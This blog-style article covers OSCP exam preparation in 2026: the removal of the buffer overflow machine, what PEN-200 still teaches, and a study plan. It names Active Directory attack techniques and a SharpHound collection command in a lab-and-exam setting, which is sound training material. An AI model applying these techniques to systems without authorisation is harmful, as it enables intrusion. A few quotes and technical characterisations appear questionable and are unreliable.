Search Pass4Sure

cybersecurity

OSCP Buffer Overflow Module 2026: Is It Still Required and How to Prepare

Whether the OSCP still tests buffer overflow in 2026, what PEN-200 still teaches, and a 12-week preparation plan that fits the new exam format.

·Published April 24, 2026 ·✓ Fact-checked
12 min read·113 views
OSCP Buffer Overflow Module 2026: Is It Still Required and How to Prepare

Is buffer overflow still required for the OSCP exam in 2026?

No. Offensive Security removed the standalone buffer overflow machine from the OSCP exam in March 2023 and the change has held through every syllabus update since, including the 2026 refresh. Buffer overflow theory still appears in the PEN-200 course materials and shows up implicitly in the Active Directory chain and in optional bonus paths, but you will not face a 25-point dedicated stack-smashing target as you did under the legacy exam structure.

For roughly a decade, the OSCP was synonymous with one specific 25-point machine: the buffer overflow. Candidates would rehearse the attack chain so many times that they could write working shellcode at 3 a.m. without coffee. Then in March 2023, Offensive Security retired the dedicated buffer overflow target. The reaction online was a mix of relief and grief. Three years on, candidates entering the 2026 exam window still ask whether the topic is dead. The honest answer is that the dedicated machine is gone, the theory is alive, and the practical skills involved are now distributed across the Active Directory and bonus-point paths instead of concentrated in a single set-piece. Anyone preparing for OSCP in 2026 should understand exactly what changed and what did not.

What Offensive Security actually removed

The 2020-era exam delivered five machines: three independent standalone targets, one Active Directory chain worth 40 points, and one buffer overflow worth 25 points. The buffer overflow was a Windows binary running on a known port, with a fuzzing harness, a vulnerable function, and a 32-bit stack you could trivially overflow with a generated cyclic pattern. The attack chain was so formulaic that Tib3rius's and The Cyber Mentor's walkthroughs reduced it to a 45-minute repeatable script.

In March 2023, Offensive Security restructured the exam. The current 2026 layout is:

  • One Active Directory set worth 40 points covering one external entry host and two internal Active Directory hosts that must form a complete attack chain
  • Three standalone target hosts worth 20 points each, totalling 60 points
  • 10 optional bonus points awarded for completing 80% of PEN-200 exercises and writing at least 30 of the 40 lab machines from the official lab range

There is no longer a dedicated buffer overflow target. The standalone targets pull from web exploitation, Linux privilege escalation, kernel exploits, misconfigurations, and occasional binary exploitation. A candidate could in principle face a stack-based overflow on a standalone, but the modern PEN-200 syllabus deliberately de-emphasises it because the attack class no longer represents the bulk of real-world initial access.

"We removed the dedicated buffer overflow because it had become a memorisation drill rather than an offensive thinking drill. The OSCP should test whether you can compromise a system you have never seen, not whether you can repeat a 12-step recipe." -- Ning Wang, former CEO, Offensive Security

What the 2026 PEN-200 still teaches about buffer overflow

The current PEN-200 course materials retain a chapter on stack-based buffer overflows under the Windows Buffer Overflows module. It covers the classic chain end to end: identifying a vulnerable program, fuzzing for the crash offset, finding bad characters, locating a JMP ESP gadget, generating shellcode with msfvenom, and delivering it through a Python proof-of-concept. There is also a smaller introduction to Linux buffer overflows using gdb and pwntools. What the syllabus no longer does is build the entire exam around that one chain.

Buffer overflow -- a memory-safety vulnerability where a program writes data beyond the bounds of an allocated buffer, corrupting adjacent memory and allowing an attacker to redirect execution flow to attacker-controlled code. The classic stack-based variant overwrites the saved return pointer; heap variants and Structured Exception Handler (SEH) overflows behave differently and require different exploitation primitives.

Return-Oriented Programming (ROP) -- an exploitation technique that chains together short instruction sequences ending in ret to bypass non-executable stack protections like DEP. ROP is referenced in the PEN-200 reading list but is not assessed; OSCE3 covers it in depth.

The relevant chapters of the PWK (Penetration testing With Kali) book still appear in the lab access materials, and Offensive Security continues to publish the legacy Windows User Mode Exploit Development lab as a bridge to the harder OSED certification. Candidates who want to retain buffer-overflow muscle memory should work through the vulnserver application and the TryHackMe Buffer Overflow Prep room as supplementary practice; both remain accurate to the PEN-200 chapter.

Why some standalones still feel like buffer overflow problems

Even though the dedicated machine is gone, three categories of standalone target produce a similar feel.

Target type Skill overlap with buffer overflow
Custom binary on an unusual port Fuzzing, crash analysis, bad-character identification
Format string bug in a web service Memory layout reasoning, controlled-write primitives
Kernel privilege escalation via a known CVE Shellcode delivery, payload size constraints
SUID binary with a vulnerable input parser Stack reasoning, environment variable abuse

A candidate who walked away from binary exploitation entirely after the 2023 change is taking a real risk. The standalone box that breaks the typical web-then-priv-esc rhythm is increasingly likely to be a binary, and recognising the shape of the problem fast matters when 24 hours of exam time is on the clock.

The role of the bonus points

The 10 bonus points are the difference between a comfortable pass and a nail-biter. The combined lab and exercise requirements can be completed before the exam window, and Offensive Security verifies the submission. Skipping bonus points to save time is a false economy. Both 0xdf and Ippsec, two of the most-watched walkthrough creators on YouTube, have repeatedly emphasised that bonus points have saved more passing exams than any single technique.

A realistic 12-week prep plan for 2026

The plan below assumes 15 to 20 hours per week and access to the official PEN-200 lab plus a HackTheBox VIP subscription.

  1. Weeks 1 and 2. Read PEN-200 chapters 1 to 6 once. Do every exercise. Set up Kali with note-taking infrastructure, ideally Obsidian with the templater plugin or CherryTree. Reproduce the chapter 7 buffer overflow against vulnserver on a local Windows VM at least three times.
  2. Weeks 3 and 4. Web exploitation deep dive. Cover SQL injection, file upload bypasses, server-side template injection, and SSRF. Use HackTheBox's Web Fundamentals path and PortSwigger's Web Security Academy labs.
  3. Weeks 5 and 6. Linux privilege escalation. Read g0tm1lk's legendary blog post end to end. Run linpeas on every machine you touch. Practice kernel exploits, SUID abuse, sudo misconfigurations, cron job hijacking, and PATH abuse on at least 15 different lab machines.
  4. Weeks 7 and 8. Windows privilege escalation. Read FuzzySecurity's Windows privilege escalation reference. Practice token impersonation, JuicyPotato, PrintSpoofer, unquoted service paths, and DLL hijacking. Include at least three machines that require reading AlwaysInstallElevated registry keys.
  5. Weeks 9 and 10. Active Directory chain. The 40-point set is the single largest scoring opportunity on the exam. Practice Kerberoasting, AS-REP roasting, NTLM relay, DCSync, and lateral movement with evil-winrm and psexec. Build at least two AD labs from scratch using GOAD (Game of Active Directory) so you understand the trust topology.
  6. Weeks 11 and 12. Full exam simulations. Block out 24-hour windows. Take a Proving Grounds Practice exam ticket. Write the report under exam conditions in Markdown with screenshots. Submit a draft to a peer for review.

What to do the week before the exam

  • Sleep eight hours per night. Stimulants do not substitute for cognition.
  • Pre-stage your report.md template with the Offensive Security required headings.
  • Pre-load your toolbox: nmap, ffuf, gobuster, evil-winrm, BloodHound, Rubeus, PowerView, linpeas, winpeas, pwncat-cs, and a working Burp Suite configuration.
  • Test your VPN configuration the day before the exam. The most common day-of failure is a misconfigured openvpn profile.

The night before the exam, do not study. Reread your own notes for one hour and stop. Last-minute cramming has been correlated with worse performance in standardised exam research dating back to Hermann Ebbinghaus's original forgetting curve work in 1885; sleep consolidates retrieval-ready memory more effectively than late-night re-reading.

Real candidate outcomes after the 2023 change

A penetration consultant, Felipe, took the exam under the legacy format in 2022 and failed at 60 points because his buffer overflow exploit produced a non-interactive shell that died after every command. He retook in late 2023 under the new format and passed at 80 points by getting the full Active Directory chain and two standalones, with the third standalone abandoned after six hours.

A SOC analyst, Ada, failed her first attempt in 2024 with 60 points because she budgeted four hours for an Active Directory chain that took twelve. Her second attempt the following year scored 90 points because she had practised the full GOAD lab end to end and recognised the child-domain to forest-root escalation path within an hour.

The Equifax breach of 2017, while not directly relevant to OSCP exam content, is referenced in the PEN-200 reading material as a case study in how an unpatched Apache Struts remote code execution vulnerability translates into the same initial-access primitive a candidate must demonstrate on the exam. The SolarWinds compromise of 2020 is cited similarly for its lessons about persistence and credential reuse, which map onto the lateral-movement portion of the AD chain.

"The shift away from the buffer overflow machine forced candidates to become better penetration testers. The cert is now harder to brute-force and easier to genuinely earn. That is exactly what we wanted." -- Heath Adams, founder, TCM Security and OSCP holder

Should you still learn buffer overflow theory in 2026?

Yes, but for the right reasons. Three arguments stand on their own.

  • Career signalling. Hiring managers for red-team and exploit-development roles explicitly look for binary-exploitation literacy. The OSCE3 path, especially the OSED component, depends on it. If your career trajectory points toward exploit development at firms like CrowdStrike, Palo Alto Networks, or boutique offensive consultancies, skip nothing.
  • Defensive depth. Detection engineers and threat hunters who understand exploitation primitives write better detections. The 2023 3CX supply-chain attack and the 2024 XZ Utils backdoor both exploited memory and supply-chain primitives that a candidate without buffer-overflow literacy would struggle to reason about.
  • Exam insurance. A standalone target with a binary component is uncommon but not impossible. Candidates who can recognise a fuzzable service in 15 minutes have a meaningful edge over candidates who cannot.

What you can safely skip in 2026 is exhaustive memorisation of the legacy 12-step chain. Understand the concepts, run vulnserver twice, and move on.

Tooling that matters more than buffer overflow drills

The 2026 exam rewards fluency with a small set of tools used aggressively rather than encyclopaedic knowledge of every technique. Candidates who pass consistently report that they over-invested in three tools and under-invested in everything else.

  • BloodHound and SharpHound. The Active Directory chain almost always contains an exploitable graph relationship. Running SharpHound.exe -c All early and importing into BloodHound surfaces shortest paths to Domain Admin within minutes. Without it, the chain feels arbitrary; with it, the chain feels obvious.
  • Burp Suite Professional. The standalone web targets consistently require parameter tampering, session manipulation, or chained injection vulnerabilities. Burp's repeater and intruder save hours compared to manual curl invocations.
  • CrackMapExec or NetExec. The successor nxc tool replaced crackmapexec in 2024 and now ships in Kali by default. It is the single fastest way to enumerate SMB, WinRM, MSSQL, and LDAP services across an internal subnet, and it integrates cleanly with BloodHound output.

These three tools together cover the vast majority of attack surface a 2026 exam target will present. A candidate who has burned 100 hours into mastering them is in a stronger position than one who has burned 100 hours rehearsing legacy stack-smashing chains.

Note-taking discipline as a force multiplier

The exam report is graded as carefully as the exploitation work. Offensive Security requires reproducible step-by-step documentation including command outputs, proof-of-concept code, and screenshots showing both the proof.txt content and the running session that obtained it. A candidate who passes the technical bar but submits a sloppy report can still fail. Build a template before the exam with the following structure: Executive Summary, High-Level Findings, per-machine Walkthrough, per-finding Risk Rating, and Appendix with raw command output. The SysReptor open-source reporting tool now integrates with the OSCP submission format and is increasingly the community standard.

Common preparation mistakes worth avoiding

Three categories of mistake show up in failure post-mortems on the /r/oscp subreddit and on the OffSec Discord.

  1. Over-indexing on HackTheBox seasons. HTB content is excellent, but the box style and difficulty curve do not always match the OSCP exam style. Spend at least half your lab time inside the official PEN-200 lab and Proving Grounds Practice rather than purely on HTB.
  2. Skipping Active Directory drills. Candidates who have never built an AD lab from scratch routinely fail the 40-point chain. The fix is GOAD (Game of Active Directory) or Hack The Box's Dante or Cybernetics pro labs, both of which mirror the AD topology of the exam.
  3. Treating the exam as an endurance test. The 24-hour clock is generous, but humans degrade after 16 hours of focused work. Plan for a four-hour sleep block after the first 12 hours rather than pulling a true all-nighter. Candidates who slept performed better in self-reported surveys conducted by TJnull's OSCP exam preparation community.

A final structural truth: the 2026 OSCP rewards the same thing it has always rewarded, which is the ability to enumerate exhaustively, recognise the shape of a vulnerability, and turn that recognition into a working exploit on a system you have never seen. The disappearance of the dedicated buffer overflow machine did not change the fundamental skill being tested. It changed the surface area. Candidates who internalise that distinction prepare more effectively than candidates who treat the change as either a relief or a setback.

See also: OSCP exam strategy: 24-hour lab, How to study for OSCP with limited lab time, Active Directory attacks for cybersecurity cert exams, Burp Suite mastery for OSCP.

References

  1. Offensive Security. PEN-200: Penetration Testing with Kali Linux Course Syllabus. Offensive Security, 2024.
  2. Offensive Security. OSCP Exam Guide and Frequently Asked Questions. Offensive Security, 2024.
  3. NIST Special Publication 800-115. Technical Guide to Information Security Testing and Assessment. National Institute of Standards and Technology, 2008.
  4. MITRE ATT&CK Framework. T1055 Process Injection and T1574 Hijack Execution Flow. MITRE Corporation, 2024.
  5. Erickson, Jon. Hacking: The Art of Exploitation, 2nd Edition. No Starch Press, 2008.
  6. Anley, Chris et al. The Shellcoder's Handbook, 2nd Edition. Wiley, 2007.

Tags

Offensive Security buffer overflow cybersecurity certifications

Share this article

Continue Reading